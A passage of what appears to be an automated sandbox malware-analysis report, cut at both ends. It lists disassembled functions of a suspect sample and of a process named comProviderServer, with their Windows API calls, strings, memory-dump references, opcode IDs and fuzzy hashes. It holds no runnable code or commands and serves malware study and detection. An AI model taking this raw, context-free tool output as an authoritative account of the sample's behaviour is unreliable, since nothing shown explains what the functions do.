              • CreateThread.KERNEL32(00000000,00010000,00B909D0,?,00000000,00000000), ref: 00B908AD
              • SetThreadPriority.KERNEL32(?,00000000), ref: 00B908F4
                • Part of subcall function 00B86E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B86EAF
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Thread$CreatePriority__vswprintf_c_l
              • String ID: CreateThread failed
              • API String ID: 2655393344-3849766595
              • Opcode ID: ed71a3a76b23a53efc9d5e5cc4b4f9ae23450f5b38b599ef8ec0b992f1847196
              • Instruction ID: 6b62e92bf9e57abeb7e0215f73bbbfa8358f8d7af6cd4162d635ebc3be99898e
              • Opcode Fuzzy Hash: ed71a3a76b23a53efc9d5e5cc4b4f9ae23450f5b38b599ef8ec0b992f1847196
              • Instruction Fuzzy Hash: F701D6B2354305AFDA207F54EC81F6673D8EF44711F2005BEF686A2191CEE1A88196A4
              Function 00B8130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B8DA98: _swprintf.LIBCMT ref: 00B8DABE
                • Part of subcall function 00B8DA98: _strlen.LIBCMT ref: 00B8DADF
                • Part of subcall function 00B8DA98: SetDlgItemTextW.USER32(?,00BBE154,?), ref: 00B8DB3F
                • Part of subcall function 00B8DA98: GetWindowRect.USER32(?,?), ref: 00B8DB79
                • Part of subcall function 00B8DA98: GetClientRect.USER32(?,?), ref: 00B8DB85
              • GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
              • SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ItemRectTextWindow$Client_strlen_swprintf
              • String ID: 0
              • API String ID: 2622349952-4108050209
              • Opcode ID: cba77097dff6018a1338ab69bcc975a7f439fe82c18e2798c696eb996732a3c1
              • Instruction ID: 7561d7edffc35fe20dd84fdc8796bf4c9ce79ededcdb29b1ae3a9dc5a8bbd671
              • Opcode Fuzzy Hash: cba77097dff6018a1338ab69bcc975a7f439fe82c18e2798c696eb996732a3c1
              • Instruction Fuzzy Hash: 96F08C3014528CF6DF252F64C809BE93BECFB20305F088CA8BD49559B1CB78C996EB24
              Function 00B9084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
              Download Yara Rule
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,00B90A78,?), ref: 00B90854
              • GetLastError.KERNEL32(?), ref: 00B90860
                • Part of subcall function 00B86E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B86EAF
              Strings
              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B90869
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
              • String ID: WaitForMultipleObjects error %d, GetLastError %d
              • API String ID: 1091760877-2248577382
              • Opcode ID: a4631dd7d2713af7cfd6621d923f1c11a5117b1979ae5bc589290b90e2d58ba9
              • Instruction ID: 3aaf022ad6f2742d96aeca1ea68582dc49590b09055cc9b7d025a3e84be31d1d
              • Opcode Fuzzy Hash: a4631dd7d2713af7cfd6621d923f1c11a5117b1979ae5bc589290b90e2d58ba9
              • Instruction Fuzzy Hash: 33D05E72A180306BCA103724AC0AFAF7A859F52B31F6007A8F639662F5DF61095182D5
              Function 00B8DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,00B8D32F,?), ref: 00B8DA53
              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B8D32F,?), ref: 00B8DA61
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FindHandleModuleResource
              • String ID: RTL
              • API String ID: 3537982541-834975271
              • Opcode ID: 8a7b65d5afdfeec2265d82cb73e307d0eff12f83f5462b77db1ce0a3c0d12c76
              • Instruction ID: bacaa2029ea80f08fc153484f84bc33a29e898ddf73f2cbb913b1b526355a975
              • Opcode Fuzzy Hash: 8a7b65d5afdfeec2265d82cb73e307d0eff12f83f5462b77db1ce0a3c0d12c76
              • Instruction Fuzzy Hash: B4C0CA32289350A7EB302620AC0DB922AC8AB10F12F190589B282DA1E0DAE5DA4086A0

              Executed Functions

              Function 00007FFAAC3FC7E0 Relevance: 2.0, Strings: 1, Instructions: 726COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID: %K
              • API String ID: 0-447823175
              • Opcode ID: a5cf0be23972045ecc8a5366cbb5c0372b994b1514d2152aa32378f6c5e91dac
              • Instruction ID: 613a85fbd0594c5bc7bad023e56d9039fbb2f7f38fe80d5c33ee22db1ec15b3e
              • Opcode Fuzzy Hash: a5cf0be23972045ecc8a5366cbb5c0372b994b1514d2152aa32378f6c5e91dac
              • Instruction Fuzzy Hash: AA427C34909A4E8FEB55EF68C459AFD7BB0FF19304F1045BAD40ED71A2DA34A548CB80
              Function 00007FFAAC3FAA8D Relevance: 1.8, Strings: 1, Instructions: 554COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID: 8e
              • API String ID: 0-1620073548
              • Opcode ID: 9ee35e7fe1ab5e7f4e16489d801b8ff03b45e2f30f49d883fd642a9c9720fb3a
              • Instruction ID: aa4022eba066e18bde9321c2e76647c9dbf922815eae45094aab9d4bf73869cc
              • Opcode Fuzzy Hash: 9ee35e7fe1ab5e7f4e16489d801b8ff03b45e2f30f49d883fd642a9c9720fb3a
              • Instruction Fuzzy Hash: 6212B43091DA4E8FEB45EB28C8595F9BBF0FF06305F0489BAD40DD71A2DA38A548C791
              Function 00007FFAAC3FAF08 Relevance: .6, Instructions: 648COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a70f04084d3c5487d99989073f47da9f0f253a68335c7570b7d842843e5d4bf1
              • Instruction ID: 3f35ef12a29a9b3fc93676503b797678cf94d2d7c6967135eb8c0fe1ade1586e
              • Opcode Fuzzy Hash: a70f04084d3c5487d99989073f47da9f0f253a68335c7570b7d842843e5d4bf1
              • Instruction Fuzzy Hash: BE327D70D5964ACFEB98DB68C459ABD7BB1FF1A305F1044BAD00ED3192CB38A944CB85
              Function 00007FFAAC3F2AC0 Relevance: .6, Instructions: 609COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e18699fbca288a083b407752fb368d121ba5d3c2fa9da9f12ba21e723aa6ae6d
              • Instruction ID: 3c2c5d22c59163f89d44015d44c41432e044306fdd2f077d7c9d175b7ca23285
              • Opcode Fuzzy Hash: e18699fbca288a083b407752fb368d121ba5d3c2fa9da9f12ba21e723aa6ae6d
              • Instruction Fuzzy Hash: CD12053191DB8ACFEB45AF34D815AED7BA0FF06311F0489BBD44DCA1A2DA24A448C7D1
              Function 00007FFAAC3F2BF0 Relevance: .6, Instructions: 606COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c09dff20d85b54598e869bbdb54c05b6e73dbb4cd0896dcc3cf7fcbe10f74f13
              • Instruction ID: 41d32c098b8e97958d247e9d7233230e8e7b59623ddbf76ee8baec98aad6e18d
              • Opcode Fuzzy Hash: c09dff20d85b54598e869bbdb54c05b6e73dbb4cd0896dcc3cf7fcbe10f74f13
              • Instruction Fuzzy Hash: 92228170919B4D8FEB45EF64C459AB9BBF0FF1A300F0189BAD409DB1A2DA34E548C791
              Function 00007FFAAC3FAF35 Relevance: .4, Instructions: 444COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e8e90a694726273b7645b80790c908e1df3eacc59454a7ae751035c8c815c96
              • Instruction ID: 821d213758adb7305395e987680b9318511b5f855c07e88612a513c1e208297f
              • Opcode Fuzzy Hash: 9e8e90a694726273b7645b80790c908e1df3eacc59454a7ae751035c8c815c96
              • Instruction Fuzzy Hash: 45F19E3094D78A9FEB95DF24C8596FA7BF0FF16304F0485BAE809C7192DA38A558C781
              Function 00007FFAAC3FC5F0 Relevance: .4, Instructions: 408COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 34d080483f3c36194ff2ae627dc89c48dac376477b68a9a30b41abe80e559f50
              • Instruction ID: b74bfe280b2e9fe6e8d7b651922ab5a2a15ebe4c575c3dfd9da7235241b8f2a6
              • Opcode Fuzzy Hash: 34d080483f3c36194ff2ae627dc89c48dac376477b68a9a30b41abe80e559f50
              • Instruction Fuzzy Hash: 44D17E30949B8E8FEB55EB24C8596FA7BF0FF16300F0549BAD409CB1A2DB34A558C791
              Function 00007FFAAC3FAF58 Relevance: .3, Instructions: 346COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 42532897a0b27861e6535c8016810f6be62f8051f4a62acbdc375d99526237bf
              • Instruction ID: f8d3fda0aeb88ff9a8505c1786d348d127b8b4265f0bbc14f52b8895698d4539
              • Opcode Fuzzy Hash: 42532897a0b27861e6535c8016810f6be62f8051f4a62acbdc375d99526237bf
              • Instruction Fuzzy Hash: 4DC18D7094964ECFEB95EF24C8596BA7BF0FF1A305F0045BAD40AD7192DB38A558CB80
              Function 00007FFAAC3F2C82 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID: `m
              • API String ID: 0-2956827927
              • Opcode ID: d88b359bfd94f6b1805515ea3602c651e75246abd22060b7b04fa58e0cbb1797
              • Instruction ID: a61536c3c231297cab1a89a42146b36bd676113e8b1aaba98609d0409dcd8cd0
              • Opcode Fuzzy Hash: d88b359bfd94f6b1805515ea3602c651e75246abd22060b7b04fa58e0cbb1797
              • Instruction Fuzzy Hash: C8C1823091DF4ACFF741EB64C8599A9BBE0EF16301F0589B6D40DCB1A2DE29E54887A1
              Function 00007FFAAC3FB0AD Relevance: .5, Instructions: 494COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b0e6a9a4045157cacdfee49b73088c34724127085ce9d98c183f55cc5e66d956
              • Instruction ID: fd9f25df16589436eaebd85a80c066b2ddaad25930c13c596d9f7decee2252e5
              • Opcode Fuzzy Hash: b0e6a9a4045157cacdfee49b73088c34724127085ce9d98c183f55cc5e66d956
              • Instruction Fuzzy Hash: E1023271D19A59CFEB98DF64C459BF8B7A1FF59300F0445BAD00EDB292CA38A844CB91
              Function 00007FFAAC3FCB00 Relevance: .4, Instructions: 408COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9772fe3439166c4e059e3a292146eb7ff993c87f98254d21b4045b33983f5854
              • Instruction ID: a9c8c791a4d236dae37f93ff65283eeab9b446cb5572ecf3b36af02e69ca56ac
              • Opcode Fuzzy Hash: 9772fe3439166c4e059e3a292146eb7ff993c87f98254d21b4045b33983f5854
              • Instruction Fuzzy Hash: 5CE1B130919A4A8FEB41EF68D4596FDBBF0FF5A314F00857AD40DD7292DA38A448CB94
              Function 00007FFAAC3FE660 Relevance: .3, Instructions: 342COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77ebce4d87f7bd1c9faddab5a2613712e9f006c92db7013ac69cbe4b7e4f3835
              • Instruction ID: cf06c1d0a061d2714c94dba7c6887e6c77f375d656dc44eee8af41be48a8787b
              • Opcode Fuzzy Hash: 77ebce4d87f7bd1c9faddab5a2613712e9f006c92db7013ac69cbe4b7e4f3835
              • Instruction Fuzzy Hash: 72D11A70919A5ACFEBA4DF18C854BEDB7B1EF15300F0045FAD40DD6291DA38AA88CF91
              Function 00007FFAAC3F1B35 Relevance: .3, Instructions: 338COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 31b341ef70c14e34a1e422544edc78084c6fcc88c2fb73caa04789413924f200
              • Instruction ID: 0b77884c1243c3a69895f8d97d7000c7bfed2a565a4e64e9d27d176b02905759
              • Opcode Fuzzy Hash: 31b341ef70c14e34a1e422544edc78084c6fcc88c2fb73caa04789413924f200
              • Instruction Fuzzy Hash: 40A1133190DF898FEB59DB2898649BA7BE1FF96300F0445BED50DCB192DA34E80987D1
              Function 00007FFAAC3F05F0 Relevance: .3, Instructions: 318COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f299d5b63c9e5ab78a139bb6ed5e559164ee34cd1581f2cae6643a314ec94568
              • Instruction ID: 562aa012c2b133806c65df66f3893748c4ec9ac3c5f9a54e0d7e70edf752a789
              • Opcode Fuzzy Hash: f299d5b63c9e5ab78a139bb6ed5e559164ee34cd1581f2cae6643a314ec94568
              • Instruction Fuzzy Hash: 7BA1B030A19F4A8FEB49DF2898549BAB7E1FF99300F14897ED40EC7192DA34E84587D1
              Function 00007FFAAC3FB090 Relevance: .3, Instructions: 318COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7739eef7abb65964adaef586f9db1c6f75520f008e01f313648f32fb6d0125d1
              • Instruction ID: 7cab8fa672054652fc31c69b2ddeeb70ec6db74c4ac91de52ca6ca3f456531f6
              • Opcode Fuzzy Hash: 7739eef7abb65964adaef586f9db1c6f75520f008e01f313648f32fb6d0125d1
              • Instruction Fuzzy Hash: B1B16E3094DB8E8FEBA5DF24C8596FA7BB0FF06300F0549BAD409CB192DB3895588791
              Function 00007FFAAC3FC9B8 Relevance: .3, Instructions: 309COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f1264e137fe4dab9e913a98d539981f9bf2f219fe779d401e58b72b2deb5c7fd
              • Instruction ID: 114d91f1cc007450edc0e78a68a3ceee02e13dcba7d01ed6832bba754db5c11e
              • Opcode Fuzzy Hash: f1264e137fe4dab9e913a98d539981f9bf2f219fe779d401e58b72b2deb5c7fd
              • Instruction Fuzzy Hash: 7CA1A53590D78A8FEB55EF38C8195EE3BE0FF16315F0445BAE44EC61A2EA34A458C781
              Function 00007FFAAC3F1688 Relevance: .3, Instructions: 285COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f884870c0ad56b18e8be680e8bd30c7b89739ade58363db39c45ea46b380f382
              • Instruction ID: 2b0207d150737a19fb9ca0f2b9b9a029c4c57f468584de77b8790155c92b3df8
              • Opcode Fuzzy Hash: f884870c0ad56b18e8be680e8bd30c7b89739ade58363db39c45ea46b380f382
              • Instruction Fuzzy Hash: 9981AE31A1DF498BEB48DB1C98519B9B7E2EF99300F14857EE54EC7292CE24EC0687D1
              Function 00007FFAAC3FB04D Relevance: .2, Instructions: 241COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ec1c11c4d598d7af4c4c1d557e4b9a9c1bae75039e4c6d1ae9571756c08363b9
              • Instruction ID: ae96c3ea3b1827fbc6cd7f47f404d96f09c2c6237af7edf11890c1eda5db29b3
              • Opcode Fuzzy Hash: ec1c11c4d598d7af4c4c1d557e4b9a9c1bae75039e4c6d1ae9571756c08363b9
              • Instruction Fuzzy Hash: AC81703094DB8E8FEB65DB24C8596FA7BB0FF16300F0549BAD409C7192DB389558C791
              Function 00007FFAAC3F2189 Relevance: .2, Instructions: 240COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1c44315d39db9d3e2d860c874ba3414dbc00292e362bb07bb996a69d64ed6c1
              • Instruction ID: 043dcf5078d70fa6d4a1f9bb5d1a48037d41f8abfa3f200ef4ac0a5356266c18
              • Opcode Fuzzy Hash: e1c44315d39db9d3e2d860c874ba3414dbc00292e362bb07bb996a69d64ed6c1
              • Instruction Fuzzy Hash: DC816570D09E1ACEFB599B24C455AB9B7A0EF46300F00C9BAD04DDA192DE79A9488BD1
              Function 00007FFAAC3F2A15 Relevance: .2, Instructions: 238COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 792cf144eb310b0ae7585e855acf099c373a45e0635b5cfaac105bfeadb34fff
              • Instruction ID: 2074c79a6713bb57bc55572dee601bf8a01798b99f64394f6ebfdf001c092dc5
              • Opcode Fuzzy Hash: 792cf144eb310b0ae7585e855acf099c373a45e0635b5cfaac105bfeadb34fff
              • Instruction Fuzzy Hash: 4681A030D5964ADFFB95EB38C4586FD7BA0FF0A305F0085BAD40EC6192DA38A548CB85
              Function 00007FFAAC3F35FE Relevance: .2, Instructions: 236COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f2de526433612770b85a7d4a7c0ddc3e8c2f789cb2ca045a2db502106398e9e1
              • Instruction ID: 8ec4d7b45c3fc4fa34b690072537b9300c894b0ed633422d5a5740a627568484
              • Opcode Fuzzy Hash: f2de526433612770b85a7d4a7c0ddc3e8c2f789cb2ca045a2db502106398e9e1
              • Instruction Fuzzy Hash: 0871C572918A4D8FE784DB6CD855BADBFE1FF9A350F5041BAC00ED7296CBB458058B80
              Function 00007FFAAC3FAF78 Relevance: .2, Instructions: 235COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 475a700d83a483f435740fcf9df3bf41c229c1ade9443f03a5852114b8bb7c79
              • Instruction ID: b1c1d51a200a301a59f428a23a65c47e0e8d7f911445eac32773495afeea1382
              • Opcode Fuzzy Hash: 475a700d83a483f435740fcf9df3bf41c229c1ade9443f03a5852114b8bb7c79
              • Instruction Fuzzy Hash: 14817C3084978E8FEB95DF24C8596FA7BF0FF16305F0045BAE809D6192DB78A558C781
              Function 00007FFAAC3FB13D Relevance: .2, Instructions: 233COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f940ef868c9aa2efb56698cd56c6ca11b8aa9454184afd631ecd7f6878065812
              • Instruction ID: 80177b15cee860cee4e3774ac45170808b52e05fa5d8326c6d585dc8958eac12
              • Opcode Fuzzy Hash: f940ef868c9aa2efb56698cd56c6ca11b8aa9454184afd631ecd7f6878065812
              • Instruction Fuzzy Hash: 8E71B5B0919F4ADFF745EB6488599F9BBE0FF16314F0589BAD40DCA0A2DA24E448C7D0
              Function 00007FFAAC3F0610 Relevance: .2, Instructions: 229COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a289328fefdfbbb3ca75df746b3dd2ca1167592bc8ff05353fae6a1534ed10c1
              • Instruction ID: faf8e531acc0db5d0d53be65f30222018f0402e513fcd704fd627da858f2da43
              • Opcode Fuzzy Hash: a289328fefdfbbb3ca75df746b3dd2ca1167592bc8ff05353fae6a1534ed10c1
              • Instruction Fuzzy Hash: 9261FB35609B56CBE701BB78E454DE977A0EF86325B08C977D08DCE0A3CE28A449C7A1
              Function 00007FFAAC3F05D0 Relevance: .2, Instructions: 229COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1425321220.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffaac3f0000_comProviderServer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
